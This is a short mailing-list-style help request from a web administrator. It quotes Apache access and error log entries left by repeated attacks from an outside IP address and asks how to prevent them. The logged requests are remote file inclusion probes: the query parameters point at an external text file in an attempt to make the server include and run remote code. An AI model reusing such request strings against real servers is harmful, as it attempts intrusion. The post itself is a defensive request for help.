<div>Every now and then some IP address from Asia or other place hits our web server and is utilizing some PHP or mod_rewrite perhaps bug to proxy themselves to another website perhaps and use a lot of bandwidth, but only our outgoing it seems.</div>
<div><br></div><div>Here is an example from access_log of this (members.php is not a valid PHP page on the site):</div><div><br></div><div><div>80.93.50.112 - - [27/Jun/2009:01:35:37 -0400] "GET //members.php?act=view&p=passwd&dir=<a href="http://lpkpm.com/lib/fatal1.txt??">http://lpkpm.com/lib/fatal1.txt??</a>?? HTTP/1.1" 404 16942 "-" "Mozilla/5.0" "-"</div>
<div>80.93.50.112 - - [27/Jun/2009:01:35:39 -0400] "GET /webpage.php//members.php?act=view&p=passwd&dir=<a href="http://lpkpm.com/lib/fatal1.txt??">http://lpkpm.com/lib/fatal1.txt??</a>?? HTTP/1.1" 200 210484729 "-" "Mozilla/5.0" "-"</div>
<div><br></div></div><div>When this happens, there are hundreds of megs of log lines like this in error_log:</div><div><br></div><div><div>[Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] PHP Warning: virtual() [<a href='function.virtual'>function.virtual</a>]: Unable to include 'footer.php' - error finding URI in /htdocs/<a href="http://website.com/webpage.php">website.com/webpage.php</a> on line 93</div>
<div><br></div></div><div>[Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] Request exceeded the limit of 10 subrequest nesting levels due to probable confguration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.</div>
<div><br></div><div><br></div><div>Any idea how to prevent this?</div><div><br></div><div>Thanks,</div><div>Ben</div>